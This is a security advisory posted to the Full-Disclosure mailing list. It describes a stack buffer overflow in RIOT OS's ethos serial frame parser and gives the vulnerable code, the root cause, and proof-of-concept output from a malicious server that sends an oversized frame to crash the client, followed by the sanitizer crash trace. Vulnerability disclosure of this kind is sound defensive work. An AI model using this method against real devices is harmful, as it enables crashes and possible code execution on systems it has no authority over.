| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GwZ5dymOt2hY-XppCKWjUDu+f70O3GOOPnpeY6h6oE1AQ@mail.gmail.com>
Date: Sat, 10 Jan 2026 00:26:58 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT
ethos Serial Frame Parser
A stack-based buffer overflow vulnerability exists in the RIOT OS ethos
utility due to missing bounds checking when processing incoming serial
frame data. The vulnerability occurs in the _handle_char() function, where
incoming frame bytes are appended to a fixed-size stack buffer
(serial->frame) without verifying that the current write index
(serial->framebytes) remains within bounds. An attacker capable of sending
crafted serial or TCP-framed input can cause serial->framebytes to exceed
the buffer size (MTU, 9000 bytes), resulting in a write past the end of the
stack buffer. This condition leads to memory corruption, application crash,
and potentially arbitrary code execution depending on compiler options and
runtime protections.
*Vulnerable Code:*
static void _handle_char(serial_t *serial, char c)
{
serial->frame[serial->framebytes] = c;
serial->framebytes++;
}
*Root Cause:*
* serial->frame is a fixed-size stack buffer (char frame[MTU])
* serial->framebytes is unbounded and attacker-controlled
* No validation against MTU before writing
*Proof of Concept:*
*listener:*# python3 payload.py
This exploit acts as a MALICIOUS SERVER.
Run ethos like: ./ethos tap0 tcp:127.0.0.1 20000
The exploit will send the payload when ethos connects.
[*] Starting malicious server on 0.0.0.0:20000
[*] Architecture: aarch64
[*] Exploitation mode: crash
[+] Server listening on 0.0.0.0:20000
[!] Waiting for ethos to connect...
[*] Run ethos like this:
./ethos tap0 tcp:127.0.0.1 20000
[+] ethos client connected from ('127.0.0.1', 37114)
[*] Generating crash payload...
[+] Crash payload ready: 9501 bytes
[*] Waiting 1 second before sending payload...
[*] Sending malicious payload (9501 bytes)...
[*] Sent 1024/9501 bytes...
[*] Sent 2048/9501 bytes...
[*] Sent 3072/9501 bytes...
[*] Sent 4096/9501 bytes...
[*] Sent 5120/9501 bytes...
[*] Sent 6144/9501 bytes...
[*] Sent 7168/9501 bytes...
[*] Sent 8192/9501 bytes...
[*] Sent 9216/9501 bytes...
[*] Sent 9501/9501 bytes...
[+] Payload sent successfully!
[!] ethos client should crash now (check for ASAN output)
[*] Received response:
b'~}"\x00\x00\x00\x00\x00\x00~~}"\x00\x00\x00\x00\x00\x00~'
[*] Connection from ('127.0.0.1', 37114) closed
*Connection:*
./ethos tap0 tcp:127.0.0.1 20000
*Output:*----> ethos: sending hello.
----> ethos: activating serial pass through.
ethos.c:186:5: runtime error: index 9000 out of bounds for type 'char[9000]'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ethos.c:186:5
=================================================================
==1375066==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbff8f804848 at pc 0xaaaae0b9fad0 bp 0xffffece78420 sp 0xffffece78418
WRITE of size 1 at 0xfbff8f804848 thread T0
#0 0xaaaae0b9facc in _handle_char
/root/RIOT/dist/tools/ethos/ethos.c:186:39
#1 0xaaaae0b9ed38 in _serial_handle_byte
/root/RIOT/dist/tools/ethos/ethos.c:216:17
#2 0xaaaae0b9ed38 in main /root/RIOT/dist/tools/ethos/ethos.c:559:34
#3 0xffff91162598 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#4 0xffff91162678 in __libc_start_main csu/../csu/libc-start.c:360:3
#5 0xaaaae0ab67ec in _start (/root/RIOT/dist/tools/ethos/ethos+0x367ec)
(BuildId: 4734887eb4858e961729a4e74b8fbfbd73e74d82)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists